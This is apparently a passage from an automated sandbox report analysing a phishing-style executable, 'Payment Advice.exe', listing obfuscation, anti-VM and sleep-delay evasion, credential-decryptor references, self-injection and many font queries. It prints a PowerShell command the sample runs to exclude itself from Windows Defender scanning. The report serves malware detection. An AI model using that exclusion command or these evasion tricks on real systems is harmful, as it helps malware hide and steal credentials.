                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, GivQ3LLx62vMKmY2FE.cs - High entropy of concatenated method names: 'DjW4SiQV8q', 'Cfh4Raqkcf', 'tYV4LIDIQU', 'DXX48V9o4O', 'qEQ4e9edCo', 'dJc46DY3eE', 'yrF4noh3cj', 'nL34QwlLou', 'oQP4HAmSlJ', 'coy4x1BTZa'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, wnc5bH9fX7sv7Za8LK.cs - High entropy of concatenated method names: 'PWjKTrSW51', 'lbaKus9gkL', 'BsdKtFlqL5', 'zwOK7oIOPC', 'yNFKFXmyxs', 'YC8KyTj51L', 'owKKDVVuiO', 'vc9K91KvRO', 'Pi3KaIKjor', 'ExVKk1YByn'
                  Source: 0.2.Payment Advice.exe.3fa9c98.4.raw.unpack, Bkn1MQhr7NFDffWBKY.cs - High entropy of concatenated method names: 'yyXyTmQdfj', 'CHUytQZZ6F', 'gRvyFBmVIs', 'PmPyDbsAG5', 's2Fy9At8Ur', 'Xu6FAhSNk7', 'UavFOTXZ57', 'tRlFowAO3D', 'IXOF3iphBM', 'T13FIGyYik'

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\Payment Advice.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\Payment Advice.exe - Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\Payment Advice.exe - Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match File source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: 1100000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: 2D90000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: 4D90000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: 9100000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: A100000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: A310000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: B310000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: 1870000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: 3400000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: 3220000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment Advice.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5271
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4524
                  Source: C:\Users\user\Desktop\Payment Advice.exe TID: 6312 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296 Thread sleep time: -3689348814741908s >= -30000s
                  Source: Payment Advice.exe, 00000000.00000002.1761916348.00000000011B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                  Source: Payment Advice.exe, 00000005.00000002.2995203152.000000000162F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                  Source: C:\Users\user\Desktop\Payment Advice.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe Code function: 5_2_0187C168 LdrInitializeThunk,LdrInitializeThunk,5_2_0187C168
                  Source: C:\Users\user\Desktop\Payment Advice.exe Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\Payment Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe Memory written: C:\Users\user\Desktop\Payment Advice.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Payment Advice.exe Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
